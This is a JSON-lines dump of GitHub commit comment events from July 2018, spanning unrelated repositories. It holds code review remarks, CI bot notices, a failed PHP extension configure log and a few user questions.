{"id":"8012986537","type":"CommitCommentEvent","actor":{"login":"EtchedPixels"},"repo":{"name":"EtchedPixels/xtrs"},"payload":{"comment":{"id":29820596,"position":7,"line":213,"path":"trs_io.c","commit_id":"d8dc8e4b0606ce2aea3f93013bddd1fb08932ab5","created_at":"2018-07-24T21:55:22Z","updated_at":"2018-07-24T21:55:22Z","author_association":"OWNER","body":"No. The hypermem really does use other bits of the sound port so it needs to fall through to do the sound effect of it as well."}},"created_at":"2018-07-24T21:55:22Z"}
{"id":"8012989622","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Node-Express-Lab"},"payload":{"comment":{"id":29820629,"position":null,"line":null,"path":null,"commit_id":"47fb90e784356fd5d68dd8bc91a3d53cc48c2625","created_at":"2018-07-24T21:56:06Z","updated_at":"2018-07-24T21:56:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [From the React application connect to the /api/posts endpoint in the API and show the list of posts.](https://trello.com/c/hV4nWzpU/3-from-the-react-application-connect-to-the-api-posts-endpoint-in-the-api-and-show-the-list-of-posts)"}},"created_at":"2018-07-24T21:56:06Z"}
{"id":"8013003373","type":"CommitCommentEvent","actor":{"login":"RossMdevs"},"repo":{"name":"EndlessHosting/Discord-LiveBot"},"payload":{"comment":{"id":29820658,"position":null,"line":null,"path":null,"commit_id":"577e0eac5092d1ec3b1f6398b8e3f5a58eb15098","created_at":"2018-07-24T21:59:26Z","updated_at":"2018-07-24T21:59:26Z","author_association":"MEMBER","body":"TY @codepupper "}},"created_at":"2018-07-24T21:59:26Z"}
{"id":"8013004189","type":"CommitCommentEvent","actor":{"login":"Aimeecus"},"repo":{"name":"KoenVingerhoets/Shimlar"},"payload":{"comment":{"id":29820659,"position":null,"line":null,"path":null,"commit_id":"d1c5873a60d6cb4d219320059413337f61974649","created_at":"2018-07-24T21:59:38Z","updated_at":"2018-07-24T21:59:38Z","author_association":"NONE","body":"Wondering if your aware someone is running shimlar right now and copyrighted a modified version of your work in a manner that allows them to con players, and is claiming intellectual copyright on your source code as there own! Also claims you gave them expressed permission to do so and change the code as they see fit and even run the game using the original name"}},"created_at":"2018-07-24T21:59:38Z"}
{"id":"8013004283","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29820660,"position":null,"line":null,"path":null,"commit_id":"5cd543b8165520b8b9913c12325843f0d735a20b","created_at":"2018-07-24T21:59:39Z","updated_at":"2018-07-24T21:59:39Z","author_association":"COLLABORATOR","body":"<h3>[Checkbox] refactor indicators style (#2721)</h3>\n\nPreview: <strong><a href='https://19089-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19089-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19089-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-24T21:59:39Z"}
{"id":"8013004993","type":"CommitCommentEvent","actor":{"login":"ofirnk"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29820662,"position":4,"line":66,"path":"micrometer-core/src/main/java/io/micrometer/core/instrument/binder/system/UptimeMetrics.java","commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T21:59:49Z","updated_at":"2018-07-24T21:59:49Z","author_association":"NONE","body":"Looks like a clean patch, I'll try that tomorrow. Thanks!\n\nOn Wed, Jul 25, 2018, 00:54 Michael Weirauch <notifications@github.com>\nwrote:\n\n> Something we could incorporate:\n>\n>     @Bean\n>     MeterFilter pushgatewayCompatMeterFilter() {\n>         return new MeterFilter() {\n>\n>             @Override\n>             public Id map(Id id) {\n>                 if (!\"process.start.time\".equals(id.getName())) {\n>                     return id;\n>                 }\n>                 /*                 * Starting with prom/pushgateway:v0.5.0 differing meter                 * descriptions are not accepted anymore. Pushgateway is                 * exposing its own \"process_start_time_seconds\" metric which                 * has a differing description than the one from Micrometer.                 */\n>                 return new Id(id.getName(), id.getTags(), id.getBaseUnit(),\n>                         \"Start time of the process since unix epoch in seconds.\", id.getType());\n>             }\n>\n>         };\n>     }\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/micrometer-metrics/micrometer/commit/5632cd4b9b534cb192791f6021ddd6f811cf34c0#commitcomment-29820590>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIDusTBPx8OxLwjLAdpcq7emK8ZBncESks5uJ5ergaJpZM4Vc7Kr>\n> .\n>\n"}},"created_at":"2018-07-24T21:59:49Z"}
{"id":"8013005442","type":"CommitCommentEvent","actor":{"login":"jaapaurelio"},"repo":{"name":"2HitAdam/laradock"},"payload":{"comment":{"id":29820664,"position":17,"line":151,"path":"php-fpm/Dockerfile","commit_id":"c272f4ca1e22521236a6e78ce3939309f053220b","created_at":"2018-07-24T21:59:56Z","updated_at":"2018-07-24T21:59:56Z","author_association":"NONE","body":"Not working with php7.1"}},"created_at":"2018-07-24T21:59:56Z"}
{"id":"8013011637","type":"CommitCommentEvent","actor":{"login":"jaapaurelio"},"repo":{"name":"2HitAdam/laradock"},"payload":{"comment":{"id":29820675,"position":23,"line":157,"path":"php-fpm/Dockerfile","commit_id":"c272f4ca1e22521236a6e78ce3939309f053220b","created_at":"2018-07-24T22:01:18Z","updated_at":"2018-07-24T22:01:18Z","author_association":"NONE","body":"Moved to PHP7.2 but now I got this:\r\n\r\n```\r\nCloning into 'v8js'...\r\nConfiguring for:\r\nPHP Api Version:         20170718\r\nZend Module Api No:      20170718\r\nZend Extension Api No:   320170718\r\nchecking for grep that handles long lines and -e... /bin/grep\r\nchecking for egrep... /bin/grep -E\r\nchecking for a sed that does not truncate output... /bin/sed\r\nchecking for cc... cc\r\nchecking whether the C compiler works... no\r\nconfigure: error: in `/tmp/v8js':\r\nconfigure: error: C compiler cannot create executables\r\nSee `config.log' for more details\r\n```"}},"created_at":"2018-07-24T22:01:18Z"}
{"id":"8013012046","type":"CommitCommentEvent","actor":{"login":"Interkarma"},"repo":{"name":"Interkarma/daggerfall-unity"},"payload":{"comment":{"id":29820677,"position":14,"line":312,"path":"Assets/Scripts/Game/PlayerEnterExit.cs","commit_id":"b02c1dee1c2f22e245aa98782d5792eebd501ad2","created_at":"2018-07-24T22:01:24Z","updated_at":"2018-07-24T22:01:24Z","author_association":"OWNER","body":"Thanks for the heads up! I'll test this and fix if @MeteoricDragon doesn't look into it first. :)"}},"created_at":"2018-07-24T22:01:24Z"}
{"id":"8013013518","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29820679,"position":null,"line":null,"path":null,"commit_id":"e96e75497c5ff441e77bbfa98acdb5da7d4afd26","created_at":"2018-07-24T22:01:43Z","updated_at":"2018-07-24T22:01:43Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-themi](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-themi).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-themi-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-24T22:01:43Z"}
{"id":"8013014760","type":"CommitCommentEvent","actor":{"login":"LivinDangerously"},"repo":{"name":"LivinDangerously/my-first-repo"},"payload":{"comment":{"id":29820680,"position":null,"line":null,"path":null,"commit_id":"7b3d738d2fe250f2c102a4392833f30bcf8356a2","created_at":"2018-07-24T22:01:59Z","updated_at":"2018-07-24T22:01:59Z","author_association":"OWNER","body":"Just playing around with a tutorial "}},"created_at":"2018-07-24T22:01:59Z"}
{"id":"8013016459","type":"CommitCommentEvent","actor":{"login":"ZaphodBeebblebrox"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29820684,"position":null,"line":null,"path":null,"commit_id":"71eae2108af5cf146c461e1cb73a6133eb65aa6e","created_at":"2018-07-24T22:02:25Z","updated_at":"2018-07-24T22:02:25Z","author_association":"MEMBER","body":"Acutally #2756, typo"}},"created_at":"2018-07-24T22:02:25Z"}
{"id":"8013020350","type":"CommitCommentEvent","actor":{"login":"mweirauch"},"repo":{"name":"micrometer-metrics/micrometer"},"payload":{"comment":{"id":29820692,"position":null,"line":null,"path":null,"commit_id":"5632cd4b9b534cb192791f6021ddd6f811cf34c0","created_at":"2018-07-24T22:03:24Z","updated_at":"2018-07-24T22:03:24Z","author_association":"COLLABORATOR","body":"Tested locally. Works for me. Will put it into a PR. "}},"created_at":"2018-07-24T22:03:24Z"}
{"id":"8013021106","type":"CommitCommentEvent","actor":{"login":"Vani-Maguire"},"repo":{"name":"Vani-Maguire/Denoising-Illumina-reads"},"payload":{"comment":{"id":29820693,"position":1,"line":1,"path":"README.md","commit_id":"97e3ae184a42209f67200ea1b45c8f6a472f96ba","created_at":"2018-07-24T22:03:35Z","updated_at":"2018-07-24T22:03:35Z","author_association":"OWNER","body":"> out <- filterAndTrim(fnFs, filtFs, fnRs, filtRs, truncLen=c(200,140),maxN=0, maxEE=c(2,4), truncQ=2, rm.phix=TRUE,\r\n+ compress=TRUE, multithread=FALSE) # On Windows set multithread=FALSE\r\n> head(out)\r\n                         reads.in reads.out\r\nM1_S1_L001_R1_001.fastq     95936     85137\r\nM2_S13_L001_R1_001.fastq   100048     88881\r\nM3_S25_L001_R1_001.fastq   109868     97849\r\nR1_S37_L001_R1_001.fastq    71477     63554\r\nR2_S49_L001_R1_001.fastq   108257     97414\r\nR3_S60_L001_R1_001.fastq   115617    103661\r\n\r\n> head(track)\r\n    input filtered denoisedF denoisedR merged nonchim\r\nM1  95936    85137     85137     85137      7       7\r\nM2 100048    88881     88881     88881      9       9\r\nM3 109868    97849     97849     97849      3       3\r\nR1  71477    63554     63554     63554      3       3\r\nR2 108257    97414     97414     97414      2       2\r\nR3 115617   103661    103661    103661     17      16\r\n\r\nAfter running the script most of my sequences are deleted. I would like to know what changes I have to make to be less restrictive with my data."}},"created_at":"2018-07-24T22:03:35Z"}
{"id":"8013021825","type":"CommitCommentEvent","actor":{"login":"jaapaurelio"},"repo":{"name":"2HitAdam/laradock"},"payload":{"comment":{"id":29820695,"position":23,"line":157,"path":"php-fpm/Dockerfile","commit_id":"c272f4ca1e22521236a6e78ce3939309f053220b","created_at":"2018-07-24T22:03:45Z","updated_at":"2018-07-24T22:03:45Z","author_association":"NONE","body":"````\r\nThis file contains any messages produced by compilers while\r\nrunning configure, to aid debugging if configure makes a mistake.\r\n\r\nIt was created by configure, which was\r\ngenerated by GNU Autoconf 2.69.  Invocation command line was\r\n\r\n  $ ./configure --with-v8js=/usr/local/lib64 LDFLAGS=-lstdc\r\n\r\n## --------- ##\r\n## Platform. ##\r\n## --------- ##\r\n\r\nhostname = 556d635d84c5\r\nuname -m = x86_64\r\nuname -r = 4.9.87-linuxkit-aufs\r\nuname -s = Linux\r\nuname -v = #1 SMP Wed Mar 14 15:12:16 UTC 2018\r\n\r\n/usr/bin/uname -p = unknown\r\n/bin/uname -X     = unknown\r\n\r\n/bin/arch              = unknown\r\n/usr/bin/arch -k       = unknown\r\n/usr/convex/getsysinfo = unknown\r\n/usr/bin/hostinfo      = unknown\r\n/bin/machine           = unknown\r\n/usr/bin/oslevel       = unknown\r\n/bin/universe          = unknown\r\n\r\nPATH: /usr/local/sbin\r\nPATH: /usr/local/bin\r\nPATH: /usr/sbin\r\nPATH: /usr/bin\r\nPATH: /sbin\r\nPATH: /bin\r\n\r\n\r\n## ----------- ##\r\n## Core tests. ##\r\n## ----------- ##\r\n\r\nconfigure:2468: checking for grep that handles long lines and -e\r\nconfigure:2526: result: /bin/grep\r\nconfigure:2531: checking for egrep\r\nconfigure:2593: result: /bin/grep -E\r\nconfigure:2598: checking for a sed that does not truncate output\r\nconfigure:2652: result: /bin/sed\r\nconfigure:2789: checking for cc\r\nconfigure:2805: found /usr/bin/cc\r\nconfigure:2816: result: cc\r\nconfigure:2847: checking for C compiler version\r\nconfigure:2856: cc --version >&5\r\ncc (Debian 4.9.2-10+deb8u1) 4.9.2\r\nCopyright (C) 2014 Free Software Foundation, Inc.\r\nThis is free software; see the source for copying conditions.  There is NO\r\nwarranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.\r\n\r\nconfigure:2867: $? = 0\r\nconfigure:2856: cc -v >&5\r\nUsing built-in specs.\r\nCOLLECT_GCC=cc\r\nCOLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.9/lto-wrapper\r\nTarget: x86_64-linux-gnu\r\nConfigured with: ../src/configure -v --with-pkgversion='Debian 4.9.2-10+deb8u1' --with-bugurl=file:///usr/share/doc/gcc-4.9/README.Bugs --enable-languages=c,c++,java,go,d,fortran,objc,obj-c++ --prefix=/usr --program-suffix=-4.9 --enable-shared --enable-linker-build-id --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.9 --libdir=/usr/lib --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-gnu-unique-object --disable-vtable-verify --enable-plugin --with-system-zlib --disable-browser-plugin --enable-java-awt=gtk --enable-gtk-cairo --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64/jre --enable-java-home --with-jvm-root-dir=/usr/lib/jvm/java-1.5.0-gcj-4.9-amd64 --with-jvm-jar-dir=/usr/lib/jvm-exports/java-1.5.0-gcj-4.9-amd64 --with-arch-directory=amd64 --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --enable-objc-gc --enable-multiarch --with-arch-32=i586 --with-abi=m64 --with-multilib-list=m32,m64,mx32 --enable-multilib --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu\r\nThread model: posix\r\ngcc version 4.9.2 (Debian 4.9.2-10+deb8u1)\r\nconfigure:2867: $? = 0\r\nconfigure:2856: cc -V >&5\r\ncc: error: unrecognized command line option '-V'\r\ncc: fatal error: no input files\r\ncompilation terminated.\r\nconfigure:2867: $? = 4\r\nconfigure:2856: cc -qversion >&5\r\ncc: error: unrecognized command line option '-qversion'\r\ncc: fatal error: no input files\r\ncompilation terminated.\r\nconfigure:2867: $? = 4\r\nconfigure:2887: checking whether the C compiler works\r\nconfigure:2909: cc   -lstdc conftest.c  >&5\r\n/usr/bin/ld: cannot find -lstdc\r\ncollect2: error: ld returned 1 exit status\r\nconfigure:2913: $? = 1\r\nconfigure:2951: result: no\r\nconfigure: failed program was:\r\n| /* confdefs.h */\r\n| #define PACKAGE_NAME \"\"\r\n| #define PACKAGE_TARNAME \"\"\r\n| #define PACKAGE_VERSION \"\"\r\n| #define PACKAGE_STRING \"\"\r\n| #define PACKAGE_BUGREPORT \"\"\r\n| #define PACKAGE_URL \"\"\r\n| /* end confdefs.h.  */\r\n|\r\n| int\r\n| main ()\r\n| {\r\n|\r\n|   ;\r\n|   return 0;\r\n| }\r\nconfigure:2956: error: in `/tmp/v8js':\r\nconfigure:2958: error: C compiler cannot create executables\r\nSee `config.log' for more details\r\n\r\n## ---------------- ##\r\n## Cache variables. ##\r\n## ---------------- ##\r\n\r\nac_cv_env_CCC_set=\r\nac_cv_env_CCC_value=\r\nac_cv_env_CC_set=\r\nac_cv_env_CC_value=\r\nac_cv_env_CFLAGS_set=\r\nac_cv_env_CFLAGS_value=\r\nac_cv_env_CPPFLAGS_set=\r\nac_cv_env_CPPFLAGS_value=\r\nac_cv_env_CPP_set=\r\nac_cv_env_CPP_value=\r\nac_cv_env_CXXCPP_set=\r\nac_cv_env_CXXCPP_value=\r\nac_cv_env_CXXFLAGS_set=\r\nac_cv_env_CXXFLAGS_value=\r\nac_cv_env_CXX_set=\r\nac_cv_env_CXX_value=\r\nac_cv_env_LDFLAGS_set=set\r\nac_cv_env_LDFLAGS_value=-lstdc\r\nac_cv_env_LIBS_set=\r\nac_cv_env_LIBS_value=\r\nac_cv_env_build_alias_set=\r\nac_cv_env_build_alias_value=\r\nac_cv_env_host_alias_set=\r\nac_cv_env_host_alias_value=\r\nac_cv_env_target_alias_set=\r\nac_cv_env_target_alias_value=\r\nac_cv_path_EGREP='/bin/grep -E'\r\nac_cv_path_GREP=/bin/grep\r\nac_cv_prog_ac_ct_CC=cc\r\nlt_cv_path_SED=/bin/sed\r\n\r\n## ----------------- ##\r\n## Output variables. ##\r\n## ----------------- ##\r\n\r\nAR=''\r\nAWK=''\r\nCC='cc'\r\nCFLAGS=''\r\nCONFIGURE_COMMAND=' '\\''./configure'\\''  '\\''--with-v8js=/usr/local/lib64'\\'''\r\nCONFIGURE_OPTIONS=' '\\''--with-v8js=/usr/local/lib64'\\'''\r\nCPP=''\r\nCPPFLAGS=''\r\nCXX=''\r\nCXXCPP=''\r\nCXXFLAGS=''\r\nDEFS=''\r\nDSYMUTIL=''\r\nECHO='echo'\r\nECHO_C=''\r\nECHO_N='-n'\r\nECHO_T=''\r\nEGREP='/bin/grep -E'\r\nEXEEXT=''\r\nGREP='/bin/grep'\r\nLDFLAGS='-lstdc'\r\nLIBOBJS=''\r\nLIBS=''\r\nLIBTOOL=''\r\nLN_S=''\r\nLTLIBOBJS=''\r\nNMEDIT=''\r\nOBJEXT=''\r\nPACKAGE_BUGREPORT=''\r\nPACKAGE_NAME=''\r\nPACKAGE_STRING=''\r\nPACKAGE_TARNAME=''\r\nPACKAGE_URL=''\r\nPACKAGE_VERSION=''\r\nPATH_SEPARATOR=':'\r\nRANLIB=''\r\nRE2C=''\r\nSED='/bin/sed'\r\nSHELL='/bin/bash'\r\nSHLIB_DL_SUFFIX_NAME=''\r\nSHLIB_SUFFIX_NAME=''\r\nSTRIP=''\r\nac_ct_CC='cc'\r\nac_ct_CXX=''\r\nbindir='${exec_prefix}/bin'\r\nbuild=''\r\nbuild_alias=''\r\nbuild_cpu=''\r\nbuild_os=''\r\nbuild_vendor=''\r\ndatadir='${datarootdir}'\r\ndatarootdir='${prefix}/share'\r\ndocdir='${datarootdir}/doc/${PACKAGE}'\r\ndvidir='${docdir}'\r\nexec_prefix='NONE'\r\nhost=''\r\nhost_alias=''\r\nhost_cpu=''\r\nhost_os=''\r\nhost_vendor=''\r\nhtmldir='${docdir}'\r\nincludedir='${prefix}/include'\r\ninfodir='${datarootdir}/info'\r\nlibdir='${exec_prefix}/lib'\r\nlibexecdir='${exec_prefix}/libexec'\r\nlocaledir='${datarootdir}/locale'\r\nlocalstatedir='${prefix}/var'\r\nmandir='${datarootdir}/man'\r\noldincludedir='/usr/include'\r\npdfdir='${docdir}'\r\nprefix='NONE'\r\nprogram_transform_name='s,x,x,'\r\npsdir='${docdir}'\r\nsbindir='${exec_prefix}/sbin'\r\nsharedstatedir='${prefix}/com'\r\nsysconfdir='${prefix}/etc'\r\ntarget=''\r\ntarget_alias=''\r\ntarget_cpu=''\r\ntarget_os=''\r\ntarget_vendor=''\r\n\r\n## ----------- ##\r\n## confdefs.h. ##\r\n## ----------- ##\r\n\r\n/* confdefs.h */\r\n#define PACKAGE_NAME \"\"\r\n#define PACKAGE_TARNAME \"\"\r\n#define PACKAGE_VERSION \"\"\r\n#define PACKAGE_STRING \"\"\r\n#define PACKAGE_BUGREPORT \"\"\r\n#define PACKAGE_URL \"\"\r\n\r\nconfigure: exit 77\r\n\r\n```"}},"created_at":"2018-07-24T22:03:45Z"}
{"id":"8013022343","type":"CommitCommentEvent","actor":{"login":"AndrijWilhite"},"repo":{"name":"AndrijWilhite/sniffles"},"payload":{"comment":{"id":29820697,"position":null,"line":null,"path":null,"commit_id":"9f596730b87247a2a98a1b929efe5d82c699c487","created_at":"2018-07-24T22:03:53Z","updated_at":"2018-07-24T22:03:53Z","author_association":"OWNER","body":"l"}},"created_at":"2018-07-24T22:03:53Z"}
{"id":"8013023679","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29820701,"position":5,"line":185,"path":"code/drasil-data/Data/Drasil/Utils.hs","commit_id":"d04fb8d6a73080089b5247c41e6b618bb76e0321","created_at":"2018-07-24T22:04:15Z","updated_at":"2018-07-24T22:04:15Z","author_association":"COLLABORATOR","body":"Note to self: this should be changed to the `LabelledContent` data type (since it produces a table)."}},"created_at":"2018-07-24T22:04:15Z"}
{"id":"8013040339","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/xorg-libxrandr-feedstock"},"payload":{"comment":{"id":29820753,"position":null,"line":null,"path":null,"commit_id":"0b913f6bea07a4aa0e515e286386a3bc36110c35","created_at":"2018-07-24T22:08:36Z","updated_at":"2018-07-24T22:08:36Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @xarthisius was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-24T22:08:36Z"}
{"id":"8013049019","type":"CommitCommentEvent","actor":{"login":"AndrijWilhite"},"repo":{"name":"AndrijWilhite/sniffles"},"payload":{"comment":{"id":29820781,"position":null,"line":null,"path":null,"commit_id":"9f596730b87247a2a98a1b929efe5d82c699c487","created_at":"2018-07-24T22:10:52Z","updated_at":"2018-07-24T22:10:52Z","author_association":"OWNER","body":"8"}},"created_at":"2018-07-24T22:10:52Z"}
{"id":"8013053880","type":"CommitCommentEvent","actor":{"login":"janoskiss680521"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29820797,"position":null,"line":null,"path":null,"commit_id":"fee33643a8aa64a8eb72ac92fd3a04d3aa7005d3","created_at":"2018-07-24T22:12:12Z","updated_at":"2018-07-24T22:12:12Z","author_association":"NONE","body":"ssl/record/rec_layer_s3.c"}},"created_at":"2018-07-24T22:12:12Z"}
{"id":"8013054926","type":"CommitCommentEvent","actor":{"login":"liyishuai"},"repo":{"name":"liyishuai/coq-http2"},"payload":{"comment":{"id":29820803,"position":null,"line":null,"path":null,"commit_id":"5933d6be0986e4133669ae52a45309c1c2642aad","created_at":"2018-07-24T22:12:30Z","updated_at":"2018-07-24T22:12:30Z","author_association":"OWNER","body":"#2 We could finish this proof with stronger type constraints, but it might pose difficulty in actual programming."}},"created_at":"2018-07-24T22:12:30Z"}
{"id":"8013056592","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29820810,"position":68,"line":129,"path":"lib/train.rb","commit_id":"6e55d7614bc88a918a04a6a4ac196638ccdc0736","created_at":"2018-07-24T22:12:56Z","updated_at":"2018-07-24T22:12:56Z","author_association":"NONE","body":"вот здесь надо переписать эти огромные if/elsif/elsif  на что-то вроде\r\n\r\nraise 'К поезду прикреплены вагоны неверного типа' unless !wagons_valid?\r\nraise 'Маршрут задан неверно' unless route_valid?\r\n\r\nпотому что elsif с ! и 5 веток - это все очень плохо\r\n"}},"created_at":"2018-07-24T22:12:56Z"}
{"id":"8013058806","type":"CommitCommentEvent","actor":{"login":"johnyatesiv"},"repo":{"name":"AndrijWilhite/sniffles"},"payload":{"comment":{"id":29820830,"position":14,"line":14,"path":"index.js","commit_id":"59b015ff81f078f78df5b2a5004278f7fb121968","created_at":"2018-07-24T22:13:34Z","updated_at":"2018-07-24T22:13:34Z","author_association":"NONE","body":"hfads"}},"created_at":"2018-07-24T22:13:34Z"}
{"id":"8013059122","type":"CommitCommentEvent","actor":{"login":"elucidsoft"},"repo":{"name":"Kirbyrawr/dotnet-stellar-sdk"},"payload":{"comment":{"id":29820831,"position":5,"line":11,"path":"stellar-dotnet-sdk/Transaction.cs","commit_id":"ad9c0f67a001aeb088da5cee61313ae42c9108dc","created_at":"2018-07-24T22:13:39Z","updated_at":"2018-07-24T22:13:39Z","author_association":"NONE","body":"Leave the constant as BaseFee we don't use the uppercase underscore style in the sdk for dotnet"}},"created_at":"2018-07-24T22:13:39Z"}
{"id":"8013061541","type":"CommitCommentEvent","actor":{"login":"elucidsoft"},"repo":{"name":"Kirbyrawr/dotnet-stellar-sdk"},"payload":{"comment":{"id":29820836,"position":null,"line":null,"path":null,"commit_id":"ad9c0f67a001aeb088da5cee61313ae42c9108dc","created_at":"2018-07-24T22:14:19Z","updated_at":"2018-07-24T22:14:19Z","author_association":"NONE","body":"I added one comment, the rest looks good. I am assuming all unit tests pass?"}},"created_at":"2018-07-24T22:14:19Z"}
{"id":"8013063912","type":"CommitCommentEvent","actor":{"login":"VYUN"},"repo":{"name":"SicariusNoctis/eagle-eye-tracker"},"payload":{"comment":{"id":29820840,"position":86,"line":60,"path":"rpi/stepper.py","commit_id":"e50f44855d8867704da9a8bf83bb61e0788d6a56","created_at":"2018-07-24T22:14:58Z","updated_at":"2018-07-24T22:14:58Z","author_association":"COLLABORATOR","body":"Oh..that's the reason for the jump in velocity in that pytest graph. That formula was arbitrarily written lol...I wasn't sure what to initialize velocity to since a 0 velocity would just make distance always 0, but I'm also only increasing velocity after a step. should I just have a separate if statement to just to handle if the velocity is 0 with: self.velocity + self.acceleration * dt ?"}},"created_at":"2018-07-24T22:14:58Z"}
{"id":"8013064412","type":"CommitCommentEvent","actor":{"login":"generic-github-user"},"repo":{"name":"generic-github-user/tfjs-visual-editor"},"payload":{"comment":{"id":29820846,"position":null,"line":null,"path":null,"commit_id":"12a1a03ddf78bc41f7729b028ab37800d24630b6","created_at":"2018-07-24T22:15:06Z","updated_at":"2018-07-24T22:15:06Z","author_association":"OWNER","body":"![image](https://user-images.githubusercontent.com/40661852/43169058-7c759802-8f6d-11e8-83a2-6852d2f18911.png)"}},"created_at":"2018-07-24T22:15:06Z"}
{"id":"8013068680","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29820863,"position":null,"line":null,"path":null,"commit_id":"aa2e997b3d72018e95fa8355e30e94298593b6c7","created_at":"2018-07-24T22:16:19Z","updated_at":"2018-07-24T22:16:19Z","author_association":"NONE","body":"issue_#6601_1 (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2985 of 2985 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aa2e997b3d72018e95fa8355e30e94298593b6c7-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-24T22:16:19Z"}
{"id":"8013069439","type":"CommitCommentEvent","actor":{"login":"twalpole"},"repo":{"name":"SeleniumHQ/selenium"},"payload":{"comment":{"id":29820866,"position":6,"line":362,"path":"rb/lib/selenium/webdriver/remote/w3c/bridge.rb","commit_id":"da6efc1b1b4809e20930050fe3a369032d00e1b7","created_at":"2018-07-24T22:16:32Z","updated_at":"2018-07-24T22:16:32Z","author_association":"CONTRIBUTOR","body":"This should split `keys` on `\\n` and upload each file separately"}},"created_at":"2018-07-24T22:16:32Z"}
{"id":"8013070013","type":"CommitCommentEvent","actor":{"login":"Kirbyrawr"},"repo":{"name":"Kirbyrawr/dotnet-stellar-sdk"},"payload":{"comment":{"id":29820868,"position":null,"line":null,"path":null,"commit_id":"ad9c0f67a001aeb088da5cee61313ae42c9108dc","created_at":"2018-07-24T22:16:42Z","updated_at":"2018-07-24T22:16:42Z","author_association":"OWNER","body":"Actually i didn't pass the tests and also i need to write tests for those additional methods, will do tomorrow! Thanks! "}},"created_at":"2018-07-24T22:16:42Z"}
{"id":"8013072702","type":"CommitCommentEvent","actor":{"login":"Henry2o1o"},"repo":{"name":"berlinux2016/MIUI10"},"payload":{"comment":{"id":29820881,"position":null,"line":null,"path":null,"commit_id":"9056ea9964f6a44338b437e9444dc2a44b08de7c","created_at":"2018-07-24T22:17:28Z","updated_at":"2018-07-24T22:17:28Z","author_association":"COLLABORATOR","body":"alphabetically sorted?"}},"created_at":"2018-07-24T22:17:28Z"}
{"id":"8013076466","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"Ellerden/railway_station"},"payload":{"comment":{"id":29820894,"position":85,"line":144,"path":"lib/train.rb","commit_id":"6e55d7614bc88a918a04a6a4ac196638ccdc0736","created_at":"2018-07-24T22:18:30Z","updated_at":"2018-07-24T22:18:30Z","author_association":"NONE","body":"route_valid? тоже очень легко рефакторится\r\n```\r\nreturn true unless @route\r\n@route.is_a?(Route) \r\n```\r\nили еще короче но чуть сложнее в восприятии\r\n`@route.nil? || @route.is_a?(Route) `\r\n\r\nвообще вот таких вещей \r\n`result = @route.is_a?(Route) ? true : false`\r\nбыть не должно\r\n\r\nпотому что это равносильно \r\n`result = @route.is_a?(Route)`\r\n\r\nну и `unless something.nil?` то же не очень, лучше написать `if something`\r\n"}},"created_at":"2018-07-24T22:18:30Z"}
